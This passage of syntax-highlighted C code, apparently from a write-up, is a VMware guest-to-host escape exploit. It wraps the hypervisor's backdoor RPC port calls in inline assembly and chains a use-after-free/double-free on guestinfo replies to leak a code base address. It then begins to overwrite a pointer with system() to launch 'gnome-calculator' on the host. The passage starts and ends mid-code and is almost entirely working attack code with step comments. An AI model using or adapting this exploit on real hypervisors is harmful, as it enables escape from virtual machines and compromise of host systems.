class="hljs-string">&quot;%r11&quot;</span>,<span class="hljs-string">&quot;%r12&quot;</span>,<span class="hljs-string">&quot;%r13&quot;</span><br>       );<br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">channel_set_len</span><span class="hljs-params">(<span class="hljs-type">int</span> cookie1,<span class="hljs-type">int</span> cookie2,<span class="hljs-type">int</span> channel_num,<span class="hljs-type">int</span> len,<span class="hljs-type">int</span> *res)</span>&#123;<br>    <span class="hljs-keyword">asm</span>(<span class="hljs-string">&quot;movl %%eax,%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%r8,%%r10\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x564d5868,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x0001001e,%%ecx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movw $0x5658,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;out %%eax,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,(%%r10)\n\t&quot;</span><br>        :<br>        :<br>        :<span class="hljs-string">&quot;%rax&quot;</span>,<span class="hljs-string">&quot;%rbx&quot;</span>,<span class="hljs-string">&quot;%rcx&quot;</span>,<span class="hljs-string">&quot;%rdx&quot;</span>,<span class="hljs-string">&quot;%rsi&quot;</span>,<span class="hljs-string">&quot;%rdi&quot;</span>,<span class="hljs-string">&quot;%r10&quot;</span><br>       );<br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">channel_send_data</span><span class="hljs-params">(<span class="hljs-type">int</span> cookie1,<span class="hljs-type">int</span> cookie2,<span class="hljs-type">int</span> channel_num,<span class="hljs-type">int</span> len,<span class="hljs-type">char</span> *data,<span class="hljs-type">int</span> *res)</span>&#123;<br>    <span class="hljs-keyword">asm</span>(<span class="hljs-string">&quot;pushq %%rbp\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%r9,%%r10\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%r8,%%rbp\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rcx,%%r11\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq $0,%%r12\n\t&quot;</span><br>        <span class="hljs-string">&quot;1:\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%r8,%%rbp\n\t&quot;</span><br>        <span class="hljs-string">&quot;add %%r12,%%rbp\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl (%%rbp),%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x564d5868,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x0002001e,%%ecx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movw $0x5658,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;out %%eax,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;addq $4,%%r12\n\t&quot;</span><br>        <span class="hljs-string">&quot;cmpq %%r12,%%r11\n\t&quot;</span><br>        <span class="hljs-string">&quot;ja 1b\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,(%%r10)\n\t&quot;</span><br>        <span class="hljs-string">&quot;popq %%rbp\n\t&quot;</span><br>        :<br>        :<br>        :<span class="hljs-string">&quot;%rax&quot;</span>,<span class="hljs-string">&quot;%rbx&quot;</span>,<span class="hljs-string">&quot;%rcx&quot;</span>,<span class="hljs-string">&quot;%rdx&quot;</span>,<span class="hljs-string">&quot;%rsi&quot;</span>,<span class="hljs-string">&quot;%rdi&quot;</span>,<span class="hljs-string">&quot;%r10&quot;</span>,<span class="hljs-string">&quot;%r11&quot;</span>,<span class="hljs-string">&quot;%r12&quot;</span><br>        );<br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">channel_recv_reply_len</span><span class="hljs-params">(<span class="hljs-type">int</span> cookie1,<span class="hljs-type">int</span> cookie2,<span class="hljs-type">int</span> channel_num,<span class="hljs-type">int</span> *len,<span class="hljs-type">int</span> *res)</span>&#123;<br>    <span class="hljs-keyword">asm</span>(<span class="hljs-string">&quot;movl %%eax,%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%r8,%%r10\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rcx,%%r11\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x564d5868,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x0003001e,%%ecx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movw $0x5658,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;out %%eax,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,(%%r10)\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ebx,(%%r11)\n\t&quot;</span><br>        :<br>        :<br>        :<span class="hljs-string">&quot;%rax&quot;</span>,<span class="hljs-string">&quot;%rbx&quot;</span>,<span class="hljs-string">&quot;%rcx&quot;</span>,<span class="hljs-string">&quot;%rdx&quot;</span>,<span class="hljs-string">&quot;%rsi&quot;</span>,<span class="hljs-string">&quot;%rdi&quot;</span>,<span class="hljs-string">&quot;%r10&quot;</span>,<span class="hljs-string">&quot;%r11&quot;</span><br>       );<br><br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">channel_recv_data</span><span class="hljs-params">(<span class="hljs-type">int</span> cookie1,<span class="hljs-type">int</span> cookie2,<span class="hljs-type">int</span> channel_num,<span class="hljs-type">int</span> offset,<span class="hljs-type">char</span> *data,<span class="hljs-type">int</span> *res)</span>&#123;<br>    <span class="hljs-keyword">asm</span>(<span class="hljs-string">&quot;pushq %%rbp\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%r9,%%r10\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%r8,%%rbp\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rcx,%%r11\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq $1,%%rbx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x564d5868,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x0004001e,%%ecx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movw $0x5658,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;in %%dx,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;add %%r11,%%rbp\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ebx,(%%rbp)\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,(%%r10)\n\t&quot;</span><br>        <span class="hljs-string">&quot;popq %%rbp\n\t&quot;</span><br>        :<br>        :<br>        :<span class="hljs-string">&quot;%rax&quot;</span>,<span class="hljs-string">&quot;%rbx&quot;</span>,<span class="hljs-string">&quot;%rcx&quot;</span>,<span class="hljs-string">&quot;%rdx&quot;</span>,<span class="hljs-string">&quot;%rsi&quot;</span>,<span class="hljs-string">&quot;%rdi&quot;</span>,<span class="hljs-string">&quot;%r10&quot;</span>,<span class="hljs-string">&quot;%r11&quot;</span>,<span class="hljs-string">&quot;%r12&quot;</span><br>       );<br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">channel_recv_finish</span><span class="hljs-params">(<span class="hljs-type">int</span> cookie1,<span class="hljs-type">int</span> cookie2,<span class="hljs-type">int</span> channel_num,<span class="hljs-type">int</span> *res)</span>&#123;<br>    <span class="hljs-keyword">asm</span>(<span class="hljs-string">&quot;movl %%eax,%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rcx,%%r10\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq $0x1,%%rbx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x564d5868,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x0005001e,%%ecx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movw $0x5658,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;out %%eax,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,(%%r10)\n\t&quot;</span><br>        :<br>        :<br>        :<span class="hljs-string">&quot;%rax&quot;</span>,<span class="hljs-string">&quot;%rbx&quot;</span>,<span class="hljs-string">&quot;%rcx&quot;</span>,<span class="hljs-string">&quot;%rdx&quot;</span>,<span class="hljs-string">&quot;%rsi&quot;</span>,<span class="hljs-string">&quot;%rdi&quot;</span>,<span class="hljs-string">&quot;%r10&quot;</span><br>       );<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">channel_recv_finish2</span><span class="hljs-params">(<span class="hljs-type">int</span> cookie1,<span class="hljs-type">int</span> cookie2,<span class="hljs-type">int</span> channel_num,<span class="hljs-type">int</span> *res)</span>&#123;<br>    <span class="hljs-keyword">asm</span>(<span class="hljs-string">&quot;movl %%eax,%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rcx,%%r10\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq $0x21,%%rbx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x564d5868,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x0005001e,%%ecx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movw $0x5658,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;out %%eax,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,(%%r10)\n\t&quot;</span><br>        :<br>        :<br>        :<span class="hljs-string">&quot;%rax&quot;</span>,<span class="hljs-string">&quot;%rbx&quot;</span>,<span class="hljs-string">&quot;%rcx&quot;</span>,<span class="hljs-string">&quot;%rdx&quot;</span>,<span class="hljs-string">&quot;%rsi&quot;</span>,<span class="hljs-string">&quot;%rdi&quot;</span>,<span class="hljs-string">&quot;%r10&quot;</span><br>       );<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">channel_close</span><span class="hljs-params">(<span class="hljs-type">int</span> cookie1,<span class="hljs-type">int</span> cookie2,<span class="hljs-type">int</span> channel_num,<span class="hljs-type">int</span> *res)</span>&#123;<br>    <span class="hljs-keyword">asm</span>(<span class="hljs-string">&quot;movl %%eax,%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rcx,%%r10\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x564d5868,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x0006001e,%%ecx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movw $0x5658,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;out %%eax,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,(%%r10)\n\t&quot;</span><br>        :<br>        :<br>        :<span class="hljs-string">&quot;%rax&quot;</span>,<span class="hljs-string">&quot;%rbx&quot;</span>,<span class="hljs-string">&quot;%rcx&quot;</span>,<span class="hljs-string">&quot;%rdx&quot;</span>,<span class="hljs-string">&quot;%rsi&quot;</span>,<span class="hljs-string">&quot;%rdi&quot;</span>,<span class="hljs-string">&quot;%r10&quot;</span><br>       );<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">channel</span>&#123;</span><br>    <span class="hljs-type">int</span> cookie1;<br>    <span class="hljs-type">int</span> cookie2;<br>    <span class="hljs-type">int</span> num;<br>&#125;;<br><span class="hljs-type">uint64_t</span> heap =<span class="hljs-number">0</span>;<br><span class="hljs-type">uint64_t</span> text =<span class="hljs-number">0</span>;<br><span class="hljs-type">void</span> <span class="hljs-title function_">run_cmd</span><span class="hljs-params">(<span class="hljs-type">char</span> *cmd)</span>&#123;<br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">channel</span> <span class="hljs-title">tmp</span>;</span><br>    <span class="hljs-type">int</span> res,len,i;<br>    <span class="hljs-type">char</span> *data;<br>    channel_open(&amp;tmp.cookie1,&amp;tmp.cookie2,&amp;tmp.num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to open channel!\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_set_len(tmp.cookie1,tmp.cookie2,tmp.num,<span class="hljs-built_in">strlen</span>(cmd),&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to set len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_send_data(tmp.cookie1,tmp.cookie2,tmp.num,<span class="hljs-built_in">strlen</span>(cmd)+<span class="hljs-number">0x10</span>,cmd,&amp;res);<br><br>    channel_recv_reply_len(tmp.cookie1,tmp.cookie2,tmp.num,&amp;len,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv data len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;recv len:%d\n&quot;</span>,len);<br>    data = <span class="hljs-built_in">malloc</span>(len+<span class="hljs-number">0x10</span>);<br>    <span class="hljs-built_in">memset</span>(data,<span class="hljs-number">0</span>,len+<span class="hljs-number">0x10</span>);<br>    <span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;len+<span class="hljs-number">0x10</span>;i+=<span class="hljs-number">4</span>)&#123;<br>        channel_recv_data(tmp.cookie1,tmp.cookie2,tmp.num,i,data,&amp;res);<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;recv data:%s\n&quot;</span>,data);<br>    channel_recv_finish(tmp.cookie1,tmp.cookie2,tmp.num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv finish\n&quot;</span>);<br>    &#125;<br><br>    channel_close(tmp.cookie1,tmp.cookie2,tmp.num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to close channel\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">leak</span><span class="hljs-params">()</span>&#123;<br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">channel</span> <span class="hljs-title">chan</span>[10];</span><br>    <span class="hljs-type">int</span> res=<span class="hljs-number">0</span>;<br>    <span class="hljs-type">int</span> len,i;  <br>    <span class="hljs-type">char</span> pay[<span class="hljs-number">8192</span>];<br>    <span class="hljs-type">char</span> *s1 = <span class="hljs-string">&quot;info-set guestinfo.a AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;</span>;<br>    <span class="hljs-type">char</span> *data;<br>    <span class="hljs-type">char</span> *s2 = <span class="hljs-string">&quot;info-get guestinfo.a&quot;</span>;<br>    <span class="hljs-type">char</span> *s21= <span class="hljs-string">&quot;info-get guestinfo.a AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;</span>;<br>    <span class="hljs-type">char</span> *s3 = <span class="hljs-string">&quot;1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;</span>;<br>    <span class="hljs-type">char</span> *s4 = <span class="hljs-string">&quot;tools.capability.dnd_version 4&quot;</span>;<br>    <span class="hljs-type">char</span> *s5 = <span class="hljs-string">&quot;vmx.capability.dnd_version&quot;</span>;<br>    <span class="hljs-comment">//init data</span><br>    run_cmd(s1); <span class="hljs-comment">// set the message len to be 0x100, so when we call info-get ,we will call malloc(0x100);</span><br>    run_cmd(s4);<br><br>    <span class="hljs-comment">//first step </span><br>    channel_open(&amp;chan[<span class="hljs-number">0</span>].cookie1,&amp;chan[<span class="hljs-number">0</span>].cookie2,&amp;chan[<span class="hljs-number">0</span>].num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to open channel!\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_set_len(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,<span class="hljs-built_in">strlen</span>(s21),&amp;res);<span class="hljs-comment">//strlen(s21) = 0x100</span><br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to set len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_send_data(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,<span class="hljs-built_in">strlen</span>(s21),s2,&amp;res);<br>    channel_recv_reply_len(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,&amp;len,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv data len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;recv len:%d\n&quot;</span>,len);<br>    data = <span class="hljs-built_in">malloc</span>(len+<span class="hljs-number">0x10</span>);<br>    <span class="hljs-built_in">memset</span>(data,<span class="hljs-number">0</span>,len+<span class="hljs-number">0x10</span>);<br>    <span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;len+<span class="hljs-number">0x10</span>;i++)&#123;<br>        channel_recv_data(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,i,data,&amp;res);<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;recv data:%s\n&quot;</span>,data);<br>    <span class="hljs-comment">//second step free the reply and let the other channel get it.</span><br><br>    channel_open(&amp;chan[<span class="hljs-number">1</span>].cookie1,&amp;chan[<span class="hljs-number">1</span>].cookie2,&amp;chan[<span class="hljs-number">1</span>].num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to open channel!\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_set_len(chan[<span class="hljs-number">1</span>].cookie1,chan[<span class="hljs-number">1</span>].cookie2,chan[<span class="hljs-number">1</span>].num,<span class="hljs-built_in">strlen</span>(s2),&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to set len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br><br>    channel_send_data(chan[<span class="hljs-number">1</span>].cookie1,chan[<span class="hljs-number">1</span>].cookie2,chan[<span class="hljs-number">1</span>].num,<span class="hljs-built_in">strlen</span>(s2)<span class="hljs-number">-4</span>,s2,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to send data\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br><br>    <span class="hljs-comment">//free the output buffer</span><br>    <span class="hljs-comment">//printf(&quot;Freeing the buffer....,bp:0x5555556DD3EF\n&quot;);</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;now let&#x27;s free\n&quot;</span>);<br>    channel_set_len(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,<span class="hljs-number">0xffff</span>,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv finish1\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;then alloc channel 1\n&quot;</span>);<br>    <span class="hljs-comment">//finished sending the command, should get the freed buffer</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Finishing sending the buffer , should allocate the buffer..,bp:0x5555556DD5BC\n&quot;</span>);<br>    channel_send_data(chan[<span class="hljs-number">1</span>].cookie1,chan[<span class="hljs-number">1</span>].cookie2,chan[<span class="hljs-number">1</span>].num,<span class="hljs-number">4</span>,&amp;s2[<span class="hljs-number">16</span>],&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to send data\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;check if channel 1&#x27;s buffer == channel 0&#x27;s buffer\n&quot;</span>);<br>    <span class="hljs-comment">//third step,free it again</span><br>    <span class="hljs-comment">//set status to be 4</span><br><br>    <span class="hljs-comment">//free the output buffer</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Free the buffer again...\n&quot;</span>);<br>    channel_set_len(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,<span class="hljs-number">0xffff</span>,&amp;res);<br><br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv finish2\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;check the heap, our target buffer in tcache now!\nTrying to reuse the buffer as a struct, which we can leak..\n&quot;</span>);<br>    run_cmd(s5);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Should be done.Check the buffer\n&quot;</span>);<br><br>    <span class="hljs-comment">//Now the output buffer of chan[1] is used as a struct, which contains many addresses</span><br>    channel_recv_reply_len(chan[<span class="hljs-number">1</span>].cookie1,chan[<span class="hljs-number">1</span>].cookie2,chan[<span class="hljs-number">1</span>].num,&amp;len,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv data len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br><br>    data = <span class="hljs-built_in">malloc</span>(len+<span class="hljs-number">0x10</span>);<br>    <span class="hljs-built_in">memset</span>(data,<span class="hljs-number">0</span>,len+<span class="hljs-number">0x10</span>);<br>    <span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;len+<span class="hljs-number">0x10</span>;i+=<span class="hljs-number">4</span>)&#123;<br>        channel_recv_data(chan[<span class="hljs-number">1</span>].cookie1,chan[<span class="hljs-number">1</span>].cookie2,chan[<span class="hljs-number">1</span>].num,i,data,&amp;res);<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;recv data:\n&quot;</span>);<br>    <span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;len;i+=<span class="hljs-number">8</span>)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;recv data:%lx\n&quot;</span>,*(<span class="hljs-type">long</span> <span class="hljs-type">long</span> *)&amp;data[i]);<br>    &#125;<br>    text = (*(<span class="hljs-type">uint64_t</span> *)data)<span class="hljs-number">-0xf818d0</span>;<br>    channel_recv_finish(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,&amp;res);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Leak Success\n&quot;</span>);<br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">exploit</span><span class="hljs-params">()</span>&#123;<br>    <span class="hljs-comment">//the exploit step is almost the same as the leak ones</span><br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">channel</span> <span class="hljs-title">chan</span>[10];</span><br>    <span class="hljs-type">int</span> res=<span class="hljs-number">0</span>;<br>    <span class="hljs-type">int</span> len,i;<br>    <span class="hljs-type">char</span> *data;<br>    <span class="hljs-type">char</span> *s1 = <span class="hljs-string">&quot;info-set guestinfo.b BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB&quot;</span>;<br>    <span class="hljs-type">char</span> *s2 = <span class="hljs-string">&quot;info-get guestinfo.b&quot;</span>;<br>    <span class="hljs-type">char</span> *s3 = <span class="hljs-string">&quot;BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB&quot;</span>;<br>    <span class="hljs-type">char</span> *s4 = <span class="hljs-string">&quot;gnome-calculator\x00&quot;</span>;<br>    <span class="hljs-type">uint64_t</span> pay1 =text+<span class="hljs-number">0xFE95B8</span>; <br>    <span class="hljs-type">uint64_t</span> pay2 =text+<span class="hljs-number">0xECFE0</span>; <span class="hljs-comment">//system</span><br>    <span class="hljs-type">uint64_t</span> pay3 =text+<span class="hljs-number">0xFE95C8</span>;<br>    <span class="hljs-type">char</span> *pay4 = <span class="hljs-string">&quot;gnome-calculator\x00&quot;</span>;<br>    <span class="hljs-comment">//run_cmd(s1);</span><br>    channel_open(&amp;chan[<span class="hljs-number">0</span>].cookie1,&amp;chan[<span class="hljs-number">0</span>].cookie2,&amp;chan[<span class="hljs-number">0</span>].num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to open channel!\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_set_len(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,<span class="hljs-built_in">strlen</span>(s1),&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to set len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_send_data(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,<span class="hljs-built_in">strlen</span>(s1),s1,&amp;res);<br>    channel_recv_reply_len(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,&amp;len,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv data len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;recv len:%d\n&quot;</span>,len);<br>    data = <span class="hljs-built_in">malloc</span>(len+<span class="hljs-number">0x10</span>);<br>    <span class="hljs-built_in">memset</span>(data,<span class="hljs-number">0</span>,len+<span class="hljs-number">0x10</span>);<br>    <span class="hljs-keyword">for</span>(i=<span 